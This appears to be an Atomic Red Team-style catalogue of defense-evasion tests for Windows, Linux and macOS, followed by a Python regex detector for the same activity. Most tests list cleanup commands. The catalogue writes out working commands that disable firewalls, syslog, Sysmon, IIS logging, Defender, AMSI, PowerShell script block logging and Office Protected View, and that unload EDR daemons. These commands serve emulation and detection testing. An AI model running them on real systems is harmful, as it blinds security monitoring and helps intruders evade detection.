Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
- Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
- Atomic Test #13 - Disable Arbitrary Security Windows Service
- Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
- Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
- Atomic Test #17 - Tamper with Windows Defender Command Prompt
Disables the iptables firewall.
Supported Platforms: Linux
Attack commands:
```sh
# CentOS 6 uses SysV init scripts; CentOS 7 uses systemd and firewalld.
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ]; then
  service iptables stop
  chkconfig iptables off
  service ip6tables stop
  chkconfig ip6tables off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ]; then
  systemctl stop firewalld
  systemctl disable firewalld
fi
```
Disables syslog collection.
Supported Platforms: Linux
Attack commands:
```sh
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ]; then
  service rsyslog stop
  chkconfig rsyslog off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ]; then
  systemctl stop rsyslog
  systemctl disable rsyslog
fi
```
Disables the Cb Response service.
Supported Platforms: Linux
Attack commands:
```sh
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 6 ]; then
  service cbdaemon stop
  chkconfig cbdaemon off
elif [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" -eq 7 ]; then
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi
```
Disables SELinux enforcement (switches it to permissive mode until the next boot).
Supported Platforms: Linux
Attack command:
```sh
setenforce 0
```
Disables Carbon Black Response.
Supported Platforms: macOS
Attack command:
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
Disables LittleSnitch.
Supported Platforms: macOS
Attack command:
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
Disables OpenDNS Umbrella.
Supported Platforms: macOS
Attack command:
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
Attack command:
```cmd
fltmc.exe unload #{sysmon_driver}
```
Cleanup commands:
```cmd
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
```
Dependency check (the Sysmon driver must be loaded) and its placeholder installer:
```cmd
fltmc.exe filters | findstr #{sysmon_driver}
echo Automated installer not implemented yet, please install Sysmon manually
```
Disables HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union). This action requires the HTTP logging configuration section in IIS to be unlocked.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
website_name | The name of the website on a server | string | Default Web Site |
Attack command:
```cmd
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
Cleanup command:
```cmd
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
Uninstall Sysinternals Sysmon for Defense Evasion.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe |
Attack command:
```cmd
sysmon -u
```
Cleanup command:
```cmd
sysmon -i -accepteula
```
Dependency check (sysmon.exe must be on the PATH) and its installer:
```powershell
# check
if(cmd /c where sysmon) {exit 0} else {exit 1}
# get prerequisite: download Sysmon next to #{sysmon_exe} and add that folder to PATH
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
Dependency check (the Sysmon service must be installed) and its installer:
```powershell
# check
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
# get prerequisite
cmd /c sysmon -i -accepteula
```
An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" field to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: Windows
Attack command:
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
Cleanup command:
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.
Supported Platforms: Windows
Attack command:
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
Cleanup command:
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
With administrative rights, an adversary can disable Windows Services related to security products.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to stop | string | McAfeeDLPAgentService |
Attack commands:
```cmd
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
Cleanup commands:
```cmd
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
Supported Platforms: Windows
Attack commands:
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
```
Cleanup commands:
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
```
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
Supported Platforms: Windows
Attack command:
```powershell
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
Attempting to disable scheduled scanning and other parts of Windows Defender ATP via PowerShell.
Supported Platforms: Windows
Attack commands:
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
```
Cleanup commands:
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```
Attempting to disable scheduled scanning and other parts of Windows Defender ATP, this time via sc.exe from the command prompt.
Supported Platforms: Windows
Attack commands:
```cmd
sc stop WinDefend
sc config WinDefend start= disabled
sc query WinDefend
```
Cleanup commands:
```cmd
sc start WinDefend
sc config WinDefend start= auto
```
Disable Windows Defender from starting after a reboot.
Supported Platforms: Windows
Attack command:
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```
Cleanup command:
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
The Gorgon Group may disable Office security features (macro warnings and Protected View) so that their code can run: https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
Attack commands:
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
```
Cleanup commands:
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
```
Removing definition files would cause ATP to not fire for AntiMalware. Check the MpCmdRun.exe man page for info on all arguments. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
Attack command:
```cmd
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
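Added detection example (not part of the Atomic Red Team page): a Python helper that flags process command lines, such as those recorded in Sysmon process-creation events or PowerShell script block logs, matching the tampering commands catalogued above. Rule names and sample events are constructed, and the patterns are written so that each test's cleanup command does not fire.

```python
import re

# Services whose stop/disable on Linux is worth an alert (all taken from the tests above).
SVC = r"(firewalld|iptables|ip6tables|rsyslog|cbdaemon)"

# Rule name -> regex over the command line. Names are my own labels, not ATT&CK ids.
RULES = {
    "defender-preference-disabled": r"Set-MpPreference\s+-Disable\w+\s+(1|\$true)\b",
    "defender-service-disabled": r"\bsc(\.exe)?\s+(stop\s+WinDefend|config\s+WinDefend\s+start=\s*disabled)\b",
    "defender-policy-disabled": r"DisableAntiSpyware\s+-Value\s+1\b",
    "defender-definitions-removed": r'MpCmdRun(\.exe)?"?\s+-RemoveDefinitions\b',
    "amsi-field-patched": r"AmsiUtils.*amsiInitFailed.*SetValue\(\$null,\s*\$true\)",
    "amsi-provider-key-removed": r"Remove-Item\b.*\\AMSI\\Providers\\",
    "scriptblock-logging-tampered": r"cachedGroupPolicySettings|EnableScriptBlock\w*Logging'\]\s*=\s*0\b",
    "sysmon-driver-unloaded": r"\bfltmc(\.exe)?\s+unload\b",
    "sysmon-uninstalled": r"\bsysmon(64)?(\.exe)?\s+-u\b",
    "iis-logging-disabled": r"appcmd(\.exe)?\s+set\s+config\b.*httplogging.*dontLog:true",
    "office-protected-view-disabled": r'Office\\[\d.]+\\\w+\\Security\b.*-Name\s+"?(VBAWarnings|Disable\w+InPV)\b',
    "linux-selinux-permissive": r"\bsetenforce\s+0\b",
    "linux-security-service-disabled": rf"\b(systemctl\s+(stop|disable)\s+{SVC}|service\s+{SVC}\s+stop|chkconfig\s+{SVC}\s+off)\b",
    "macos-security-daemon-unloaded": r"\blaunchctl\s+unload\b.*(carbonblack|littlesnitch|opendns)",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def classify(cmdline):
    """Return the names of every rule the command line matches; [] means nothing to flag.
    Cleanup commands (the 0 / $false / start= auto variants) deliberately do not match."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]


def scan(events):
    """events: iterable of (host, user, cmdline) tuples; returns (host, user, rule) hits."""
    return [(host, user, rule) for host, user, cmd in events for rule in classify(cmd)]


# Constructed sample telemetry, not real data: two tampering events and two benign ones.
SAMPLE_EVENTS = [
    ("ws01", "alice", 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring 1"'),
    ("srv02", "svc_web", 'appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true'),
    ("ws01", "alice", "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring 0"),
    ("srv03", "root", "systemctl restart firewalld"),
]

if __name__ == "__main__":
    for host, user, rule in scan(SAMPLE_EVENTS):
        print(f"ALERT host={host} user={user} rule={rule}")
```

Command-line matching is only a first layer: the AMSI and script block logging tests leave no registry or service change behind, so pairing this with PowerShell script block logging (event 4104) matters most for those.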